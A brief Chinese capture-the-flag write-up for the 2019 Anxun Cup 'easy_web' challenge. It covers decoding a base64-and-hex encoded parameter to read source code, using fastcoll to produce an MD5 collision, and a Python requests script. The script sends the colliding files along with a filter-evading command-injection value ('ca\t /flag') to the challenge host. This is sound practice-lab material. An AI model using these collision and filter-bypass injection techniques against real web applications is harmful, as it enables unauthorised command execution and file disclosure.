[安洵杯 2019]easy_web
看到url出有类似于base的 两次解密之后 盲猜十六进制解密 这样可以查看index.php的内容 先将index.php进行十六进制编码之后base64加密两次
payload: TmprMlpUWTBOalUzT0RKbE56QTJPRGN3
获得源码base64 解密,  这个地方用MD5强碰撞用fastcoll生成payload
fastcoll_v1.0.0.5.exe 1.txt
 然后使用python写脚本发送数据
import urllib
import hashlib
f1 = open('1_msg1.txt','rb').read()
f2 = open('1_msg2.txt','rb').read()
data1 = f1
print(data1)
data2 = f2
print(data2)
import requests
url = 'http://e959cca5-366b-470e-bcab-fb92656d9b24.node4.buuoj.cn/index.php?img=1&cmd=ca\\t /flag'
data = {
'a':data1,
'b':data2
}
r = requests.post(url,data=data)
print(r.text)
得到flag 
|